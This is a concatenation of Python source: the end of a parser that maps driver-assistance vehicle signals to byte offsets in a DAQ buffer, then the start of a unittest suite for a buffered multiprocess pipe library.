self.redis_dict_raw['objects'][int(name_tmp.split('.')[-1].replace('_', ''))]['collision_prob']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_laneAnnotatedRLObjects' in name_tmp:
if name_tmp.endswith('_m_dx'):
self.redis_dict_raw['cr_objects'][int(name_tmp.split('.')[-2].replace('_', ''))]['dx']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_dy'):
self.redis_dict_raw['cr_objects'][int(name_tmp.split('.')[-2].replace('_', ''))]['dy']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_id'):
self.redis_dict_raw['cr_objects'][int(name_tmp.split('.')[-2].replace('_', ''))]['index']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_vxvRef'):
self.redis_dict_raw['cr_objects'][int(name_tmp.split('.')[-2].replace('_', ''))]['vx']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_isValid'):
self.redis_dict_raw['cr_objects'][int(name_tmp.split('.')[-2].replace('_', ''))]['state']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_laneAnnotatedRRObjects' in name_tmp:
if name_tmp.endswith('_m_dx'):
self.redis_dict_raw['cr_objects'][6 + int(name_tmp.split('.')[-2].replace('_', ''))]['dx']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_dy'):
self.redis_dict_raw['cr_objects'][6 + int(name_tmp.split('.')[-2].replace('_', ''))]['dy']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_id'):
self.redis_dict_raw['cr_objects'][6 + int(name_tmp.split('.')[-2].replace('_', ''))]['index']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_vxvRef'):
self.redis_dict_raw['cr_objects'][6 + int(name_tmp.split('.')[-2].replace('_', ''))]['vx']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_isValid'):
self.redis_dict_raw['cr_objects'][6 + int(name_tmp.split('.')[-2].replace('_', ''))]['state']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_feasibility_corner_arb_Rrl'):
self.redis_dict_raw['other']['coll_rl'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_feasibility_corner_arb_Rrr'):
self.redis_dict_raw['other']['coll_rr'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_accTargetPosition'):
self.redis_dict_raw['other']['acc'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_intelDodgeTargetPosition'):
self.redis_dict_raw['other']['dodge'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_hmiLineC0._m_value.' in name_tmp:
self.redis_dict_raw['lanes']['a0'][int(name_tmp.split('.')[-1].replace('_', ''))]\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_hmiLineC1'):
self.redis_dict_raw['lanes']['a1'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_hmiLineC2'):
self.redis_dict_raw['lanes']['a2'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_hmiLineC3'):
self.redis_dict_raw['lanes']['a3'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_hmiLineC4'):
self.redis_dict_raw['lanes']['a4'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_hmiLineC5'):
self.redis_dict_raw['lanes']['a5'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_hmiLineDxStart'):
self.redis_dict_raw['lanes']['start'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_hmiLineDxEnd'):
self.redis_dict_raw['lanes']['end'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_hmiLineType._m_value.' in name_tmp:
self.redis_dict_raw['lanes']['type'][int(name_tmp.split('.')[-1].replace('_', ''))]\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_isADAvailableInfo' in name_tmp:
self.redis_dict_raw['vehInfo']['AD_available'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_laneChangeFailReason' in name_tmp:
self.redis_dict_raw['vehInfo']['LC_fail_reason'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_laneChangeProgress' in name_tmp:
self.redis_dict_raw['vehInfo']['LC_progress'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_laneChangeReason' in name_tmp:
self.redis_dict_raw['vehInfo']['LC_reason'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '._handsOnWarningLevel' in name_tmp:
self.redis_dict_raw['vehInfo']['Hands_on_warning_level'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '._HFeyesOnWarningLevel' in name_tmp:
self.redis_dict_raw['vehInfo']['Eyes_on_warning_level'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '._isHFAvailable' in name_tmp:
self.redis_dict_raw['vehInfo']['HF_available'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '._isHFQuit' in name_tmp:
self.redis_dict_raw['vehInfo']['HF_quit'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '._isAdQuit' in name_tmp:
self.redis_dict_raw['vehInfo']['AD_quit'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '._m_ifNeedPressButtonForLC' in name_tmp:
self.redis_dict_raw['vehInfo']['LC_confirmation'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '._m_isADActiveReminder' in name_tmp:
self.redis_dict_raw['vehInfo']['is_AD_active_reminder'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_adCannotActiveReason' in name_tmp:
self.redis_dict_raw['vehInfo']['AD_inactive_reason'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_HFTakeOverReqWarningLevel' in name_tmp:
self.redis_dict_raw['vehInfo']['HF_tor_reason'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_isHFwillExitSoon' in name_tmp:
self.redis_dict_raw['vehInfo']['HF_exit_forecast'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_isHFActive' in name_tmp:
self.redis_dict_raw['vehInfo']['HF'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_adEnterRampReminder' in name_tmp:
self.redis_dict_raw['vehInfo']['AD_enter_ramp'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_vDisInKph' in name_tmp:
self.redis_dict_raw['vehInfo']['VehSpd'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_ayvRef_sw' in name_tmp:
self.redis_dict_raw['vehInfo']['ayv'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_axvRef_sw' in name_tmp:
self.redis_dict_raw['vehInfo']['axv'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_alcState' in name_tmp:
self.redis_dict_raw['vehInfo']['ALC'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_latState' in name_tmp:
self.redis_dict_raw['vehInfo']['TJA'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_longState' in name_tmp:
self.redis_dict_raw['vehInfo']['ACC'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_isLeftDodgeActive' in name_tmp:
self.redis_dict_raw['vehInfo']['LOC_L'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_isRightDodgeActive' in name_tmp:
self.redis_dict_raw['vehInfo']['LOC_R'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_ldwState' in name_tmp:
self.redis_dict_raw['vehInfo']['LDW'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_netsigVCU_CrntGearLvl' in name_tmp:
self.redis_dict_raw['vehInfo']['Gear'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_netsigMRR_TargetSpd' in name_tmp:
self.redis_dict_raw['vehInfo']['TargetSpd'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_LCTriggerSide' in name_tmp:
self.redis_dict_raw['vehInfo']['Auto_LC'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_softSwitchStatus'):
self.redis_dict_raw['vehInfo']['AD_Switch'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_switchOnAfterReminder'):
self.redis_dict_raw['vehInfo']['AD_on_remind'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_isADActive'):
self.redis_dict_raw['vehInfo']['AD'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_netsigBCM_LeftTurnLampSt'):
self.redis_dict_raw['vehInfo']['TurnLight_L'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_netsigBCM_RightTurnLampSt'):
self.redis_dict_raw['vehInfo']['TurnLight_R'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_egoLaneChangeGo'):
self.redis_dict_raw['traj']['ss_status'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_dVmcToAc_left'):
self.redis_dict_raw['traj']['ss_left_end'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_dVmcToDc_left'):
self.redis_dict_raw['traj']['ss_left_start'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_dVmcToAc_right'):
self.redis_dict_raw['traj']['ss_right_end'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_dVmcToDc_right'):
self.redis_dict_raw['traj']['ss_right_start'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_vmcTrajCoefficientOutput._m_value' in name_tmp:
self.redis_dict_raw['traj']['a' + name_tmp.split('.')[-1].replace('_', '')]\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_vmcTrajDxEndOutput'):
self.redis_dict_raw['traj']['dx_end'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
else:
print('Error occurred in variable walk through: ' + name_tmp)
byte_ptr += abs(each_item[2]) % 32
self.daq_len = byte_ptr
self.daq = bytes(byte_ptr)
self.daq_num = len(daq_tmp.keys())
self.calc_daq_pack_len(daq_tmp)
def calc_daq_pack_len(self, daq_tmp):
for i in range(len(daq_tmp.keys())):
len_tmp = 0
for j in range(len(daq_tmp[i].keys())):
for each_item in daq_tmp[i][j]:
len_tmp += abs(each_item[2]) % 32
self.daq_pack_len.append(len_tmp)
len_tmp += 6 * len(daq_tmp[i].keys()) + 4
self.daq_pack_len_list.append(len_tmp)
|
generic_pipe.py
|
import collections
import copy
import hashlib
import itertools
import multiprocessing
import os
import random
import sys
import threading
import time
import unittest
from buffered_pipe import Generic_Pipe as Pipe
Testing_Types = "LO"
if len(sys.argv) > 1:
try:
Testing_Types = sys.argv[1]
except:
...
# random_bytes = lambda n: bytes(random.randint(0, 255) for _ in range(n))
total_gen_bytes = 0
def random_bytes(n):
global total_gen_bytes
total_gen_bytes += n
return os.urandom(n)
def dataset(length, count):
return [random_bytes(random.randint(*length)) for _ in range(count)]
def producer(pipe, data):
for I in data:
pipe.send(I)
def mpmt_producer(pipe, data: list, barrier: multiprocessing.Barrier):
# print(f"prod reach barrier", "%x"%threading.current_thread().ident)
barrier.wait()
# print(f"prod pass barrier", "%x"%threading.current_thread().ident)
for I in data:
pipe.send(I)
# print(f"prod finish")
# print(f"prod finish with send {len(data)} elements")
def mpmt_consumer(pipe, RTQ: multiprocessing.Queue, finished: bytes, barrier: multiprocessing.Barrier):
# print(f"cons reach barrier", "%x"%threading.current_thread().ident)
barrier.wait()
# print(f"cons pass barrier", "%x"%threading.current_thread().ident)
items = []
while True:
data = pipe.recv()
if data == finished:
break
items.append(data)
# print(f"cons finish")
# print(f"cons finish with recv {len(items)} elements")
RTQ.put(items)
# print(f"cons Qin finish")
def type_tester(pipe, data):
# single prod, single cons
for idx, exp in enumerate(data):
ret = pipe.recv()
if exp != ret:
raise Exception(f"{exp} != {ret} at {idx}")
return True
def joinable_test(Idatas, Odatas):
# 1. count
# 2. each Idata possible in Odatas
def _sub(I_set, Odatas):
def pruning(selected, options):
update = False
S_pos = [-1] * len(Odatas)
for i in range(len(selected)):
if selected[i] is None:
options[i] = [(r, c) for r, c in options[i] if S_pos[r] < c]
if len(options[i]) == 1:
selected[i] = options[i][0]
update = True
if selected[i] is not None:
S_pos[selected[i][0]] = selected[i][1]
E_pos = [len(I) for I in Odatas]
for i in range(len(selected) - 1, -1, -1):
if selected[i] is None:
options[i] = [(r, c) for r, c in options[i] if E_pos[r] > c]
if len(options[i]) == 1:
selected[i] = options[i][0]
update = True
if selected[i] is not None:
E_pos[selected[i][0]] = selected[i][1]
return update
def rec_solver(selected, options):
update = True
while update:
update = pruning(selected, options)
if all(map(lambda x: x is not None, selected)):
return True
for i in range(len(selected)):
if selected[i] is None:
for o in options[i]:
# print("try random")
s_cp, o_cp = copy.copy(selected), copy.copy(options)
s_cp[i] = o
if rec_solver(s_cp, o_cp):
return True
return False
E_pos = collections.defaultdict(list)
E_rpos = collections.defaultdict(list)
for i, I in enumerate(I_set):
E_pos[I].append(i)
for i, OD in enumerate(Odatas):
for j, O in enumerate(OD):
if O in E_pos:
E_rpos[O].append((i, j))
return rec_solver([None] * len(I_set), [E_rpos[I] for I in I_set])
Idatas = [[hashlib.sha256(J).digest() for J in I] for I in Idatas]
Odatas = [[hashlib.sha256(J).digest() for J in I] for I in Odatas]
Iset = collections.Counter(itertools.chain.from_iterable(Idatas))
Oset = collections.Counter(itertools.chain.from_iterable(Odatas))
if Oset.keys() - (Iset.keys() & Oset.keys()):
# recv unsended data
return -1
if len(Oset) != len(Iset):
# unique count do not match
return -2
if Iset != Oset:
return -3
return all(_sub(I, Odatas) for I in Idatas)
def type20_tester(pipe_r, pipe_w, *data, mp_prod=0, mt_prod=0, mp_cons=0, mt_cons=0, end_Data=None, ctx=None):
# def type20_tester(pipe_r, pipe_w, *data, mp_prod = 0, mt_prod = 0, ctx = None):
# multi prod, main thread cons
# print(f"mp_prod = {mp_prod} , mt_prod = {mt_prod}")#, end_Data = {end_Data} ")
assert len(data) == mp_prod + mt_prod
ctx = ctx or multiprocessing.get_context()
prod_barrier = ctx.Barrier(mp_prod + mt_prod)
get_args = lambda idx: (pipe_w, data[idx], prod_barrier)
mp_prods = [ctx.Process(target=mpmt_producer, args=get_args(idx)) for idx in range(mp_prod)]
mt_prods = [threading.Thread(target=mpmt_producer, args=get_args(mp_prod + idx)) for idx in range(mt_prod)]
# print(f"MPST prod ({len(mp_prods + mt_prods)}) start with {threading.activeCount()} mt {multiprocessing.active_children()} mp ")
for MPMT in itertools.chain(mp_prods, mt_prods):
MPMT.start()
# time.sleep(0.02)
# print("MPSC cons collect")
result = []
for _ in range(sum(map(len, data))):
result.append(pipe_r.recv())
# print("MPSC prod join")
for MPMT in itertools.chain(mp_prods, mt_prods):
MPMT.join()
# print("joinable result")
R = joinable_test(data, [result])
# print(f"MPST prod ({len(mp_prods + mt_prods)}) end with {threading.activeCount()} mt {multiprocessing.active_children()} mp ")
return R
def type02_tester(pipe_r, pipe_w, *data, mp_prod=0, mt_prod=0, mp_cons=0, mt_cons=0, end_Data=None, ctx=None):
# def type02_tester(pipe_r, pipe_w, *data, mp_cons = 0, mt_cons = 0, end_Data = None, ctx = None):
# main thread prod, multi cons
# print(f"mp_cons = {mp_cons}, mt_cons = {mt_cons}")#, end_Data = {end_Data} ")
assert len(data) == 1
ctx = ctx or multiprocessing.get_context()
RTQ = ctx.SimpleQueue()
cons_barrier = ctx.Barrier(mp_cons + mt_cons)
args = (pipe_r, RTQ, end_Data, cons_barrier)
mp_conss = [ctx.Process(target=mpmt_consumer, args=args) for _ in range(mp_cons)]
mt_conss = [threading.Thread(target=mpmt_consumer, args=args) for _ in range(mt_cons)]
# print(f"SPMT cons ({len(mp_conss + mt_conss)}) start with {threading.activeCount()} mt {multiprocessing.active_children()} mp ")
for MPMT in itertools.chain(mp_conss, mt_conss):
MPMT.start()
# print("SPMC send data")
for I in data[0]:
pipe_w.send(I)
# print("SPMC cons send end_Data")
for MPMT in itertools.chain(mp_conss, mt_conss):
pipe_w.send(end_Data)
# print("SPMC cons collect")
results = []
for MPMT in itertools.chain(mp_conss, mt_conss):
results.append(RTQ.get())
# print("SPMC cons join")
for MPMT in itertools.chain(mp_conss, mt_conss):
MPMT.join()
# print("joinable result")
R = joinable_test(data, results)
# print(f"MPST prod ({len(mp_conss + mt_conss)}) end with {threading.activeCount()} mt {multiprocessing.active_children()} mp ")
return R
def type22_tester(pipe_r, pipe_w, *data, mp_prod=0, mt_prod=0, mp_cons=0, mt_cons=0, end_Data=None, ctx=None):
# multi prod, multi cons
# print(f"mp_prod = {mp_prod} , mt_prod = {mt_prod}, mp_cons = {mp_cons}, mt_cons = {mt_cons}")#, end_Data = {end_Data} ")
assert len(data) == mp_prod + mt_prod
ctx = ctx or multiprocessing.get_context()
RTQ = ctx.SimpleQueue()
prod_barrier = ctx.Barrier(mp_prod + mt_prod)
cons_barrier = ctx.Barrier(mp_cons + mt_cons)
# prod_barrier = cons_barrier = ctx.Barrier(mp_prod + mt_prod + mp_cons + mt_cons)
get_args = lambda idx: (pipe_w, data[idx], prod_barrier)
mp_prods = [ctx.Process(target=mpmt_producer, args=get_args(idx)) for idx in range(mp_prod)]
mt_prods = [threading.Thread(target=mpmt_producer, args=get_args(mp_prod + idx)) for idx in range(mt_prod)]
args = (pipe_r, RTQ, end_Data, cons_barrier)
mp_conss = [ctx.Process(target=mpmt_consumer, args=args) for _ in range(mp_cons)]
mt_conss = [threading.Thread(target=mpmt_consumer, args=args) for _ in range(mt_cons)]
# print(f"MPMC prod ({len(mp_prods + mt_prods)}) / cons ({len(mp_conss + mt_conss)}) start with {threading.activeCount()} mt {multiprocessing.active_children()} mp ")
for MPMT in itertools.chain(mp_prods, mt_prods, mp_conss, mt_conss):
MPMT.start()
# time.sleep(0.02)
# print(f"MPMC prod join")
for MPMT in itertools.chain(mp_prods, mt_prods):
MPMT.join()
# print(f"MPMC cons finish final data send")
for MPMT in itertools.chain(mp_conss, mt_conss):
pipe_w.send(end_Data)
# print(f"MPMC cons collect")
results = []
for MPMT in itertools.chain(mp_conss, mt_conss):
results.append(RTQ.get())
# print(f"MPMC cons join")
for MPMT in itertools.chain(mp_conss, mt_conss):
MPMT.join()
# print(f"MPMC joinable result")
# print('\n----------------\n', data, '\n', results, '\n=============\n')
# print(f"\n----------------\n {[len(I) for I in data]} \n {[len(I) for I in results]} \n=============\n")
R = joinable_test(data, results)
# if R is not True:
# print(f"\n----------------\n {data} \n {results} \n=============\n")
# print(f"MPMC prod ({len(mp_prods + mt_prods)}) / cons ({len(mp_conss + mt_conss)}) end with {threading.activeCount()} mt {multiprocessing.active_children()} mp ")
return R
class transfer_tracker:
@classmethod
def setUpClass(cls):
try:
cls.transfers
except:
cls.transfers = 0
cls.transfers -= total_gen_bytes
@classmethod
def tearDownClass(cls):
cls.transfers += total_gen_bytes
print(f"{cls.__name__} transfer = {cls.transfers}")
for K, V in cls.spend_time.items():
print(f"{K} : {V: 4.2f}")
class TestCase_SPSC:
spend_time = collections.defaultdict(float)
def __init__(self, length, count, buf_size, concurrency, seed):
self.length = length
self.count = count
self.buf_size = buf_size
self.concurrency = concurrency
self.seed = seed
def mp_test(self, data, ctx=multiprocessing.get_context(), spend_time=None):
spend_time[type(ctx).__name__] -= time.time()
pipe_r, pipe_w = Pipe(self.buf_size, 64 if 64 < self.buf_size else 2, self.concurrency, self.concurrency)
P = ctx.Process(target=producer, args=(pipe_w, data))
P.start()
result = type_tester(pipe_r, data)
spend_time[type(ctx).__name__] += time.time()
return result
def mt_test(self, data, spend_time=None):
spend_time["threading"] -= time.time()
pipe_r, pipe_w = Pipe(self.buf_size, 64 if 64 < self.buf_size else 2, self.concurrency, self.concurrency)
P = threading.Thread(target=producer, args=(pipe_w, data))
P.start()
spend_time["threading"] += time.time()
return type_tester(pipe_r, data)
@classmethod
def test_all(cls, length, count, buf_size, concurrency, seed, utc):
TC = cls(length, count, buf_size, concurrency, seed)
utc.spend_time["data gen"] -= time.time()
random.seed(seed)
data = dataset(length, count)
utc.spend_time["data gen"] += time.time()
kwargs = {"data": data, "spend_time": utc.spend_time}
utc.assertEqual(TC.mp_test(ctx=multiprocessing.get_context("fork"), **kwargs), True)
utc.assertEqual(TC.mp_test(ctx=multiprocessing.get_context("spawn"), **kwargs), True)
utc.assertEqual(TC.mp_test(ctx=multiprocessing.get_context("forkserver"), **kwargs), True)
utc.assertEqual(TC.mt_test(**kwargs), True)
class Type_0(transfer_tracker, unittest.TestCase):
spend_time = collections.defaultdict(float)
def test_small1(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
TestCase_SPSC.test_all((4, 4), 2**15, 5, 1, seed, self)
def test_small2(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
TestCase_SPSC.test_all((4, 4), 2**15, 20, 1, seed, self)
def test_small3(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
TestCase_SPSC.test_all((4, 4), 2**15, 16, 4, seed, self)
def test_small4(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
TestCase_SPSC.test_all((1, 2**7), 2**14, 2**5, 4, seed, self)
def test_small5(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
TestCase_SPSC.test_all((1, 2**7), 2**14, 2**10, 4, seed, self)
def test_small6(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
TestCase_SPSC.test_all((1, 2**10), 2**12, 2**12, 16, seed, self)
def test_small7(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
TestCase_SPSC.test_all((1, 2**16), 2**8, 2**18, 16, seed, self)
class TestCase_MPMC_base:
# mtmc_seed = 0
# spend_time = collections.defaultdict(float)
# target_fn = type22_tester
def __init__(self, length, buf_size, concurrency, seed):
self.length = length
self.buf_size = buf_size
self.concurrency = concurrency
self.seed = seed
def run_test(self, data, end_Data, cons_cnt, ctx=multiprocessing.get_context(), spend_time=None):
spend_time[type(ctx).__name__] -= time.time()
pipe_r, pipe_w = Pipe(self.buf_size, 64 if 64 < self.buf_size else 2, self.concurrency, self.concurrency)
random.seed(type(self).mtmc_seed)
type(self).mtmc_seed += 1
mp_prod = random.randrange(0, len(data))
mt_prod = len(data) - mp_prod
mp_cons = random.randrange(0, cons_cnt)
mt_cons = cons_cnt - mp_cons
result = type(self).target_fn(
pipe_r,
pipe_w,
*data,
mp_prod=mp_prod,
mt_prod=mt_prod,
mp_cons=mp_cons,
mt_cons=mt_cons,
end_Data=end_Data,
ctx=ctx,
)
spend_time[type(ctx).__name__] += time.time()
return result
@classmethod
def test_all(cls, length, data_size_range, prod_cnt, cons_cnt, buf_size, concurrency, seed, utc):
TC = cls(length, buf_size, concurrency, seed)
while True:
utc.spend_time["data gen"] -= time.time()
random.seed(seed)
data = [dataset(length, random.randrange(*data_size_range)) for _ in range(prod_cnt)]
utc.spend_time["data gen"] += time.time()
utc.spend_time["search unused"] -= time.time()
data_hashes = set(hashlib.sha256(I).digest() for I in itertools.chain.from_iterable(data))
end_Data = dataset(length, 1)[0]
for _ in range(10):
if hashlib.sha256(end_Data).digest() not in data_hashes:
break
end_Data = dataset(length, 1)[0]
utc.spend_time["search unused"] += time.time()
if hashlib.sha256(end_Data).digest() not in data_hashes:
break
kwargs = {"data": data, "end_Data": end_Data, "cons_cnt": cons_cnt, "spend_time": utc.spend_time}
utc.assertEqual(TC.run_test(ctx=multiprocessing.get_context("fork"), **kwargs), True)
utc.assertEqual(TC.run_test(ctx=multiprocessing.get_context("spawn"), **kwargs), True)
utc.assertEqual(TC.run_test(ctx=multiprocessing.get_context("forkserver"), **kwargs), True)
def random_ordered_cycle(S, E):
local_random = random.Random(123)
while True:
X = list(range(S, E))
local_random.shuffle(X)
yield from X
class Test_suite_base:
# target_class = TestCase_MPMC
# prod_cnt_ord = random_ordered_cycle(1, 4)
# cons_cnt_ord = random_ordered_cycle(1, 4)
def test_small1(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((4, 4), (1, 10), *cnt_case, 5, 1, seed, self)
def test_small2(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((4, 4), (1, 100), *cnt_case, 20, 4, seed, self)
def test_small3(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((4, 4), (10, 100), *cnt_case, 16, 4, seed, self)
def test_small4(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((1, 2**7), (1, 50), *cnt_case, 2**10, 4, seed, self)
def test_small5(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((1, 2**7), (0, 10), *cnt_case, 2**16, 16, seed, self)
def test_small6(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
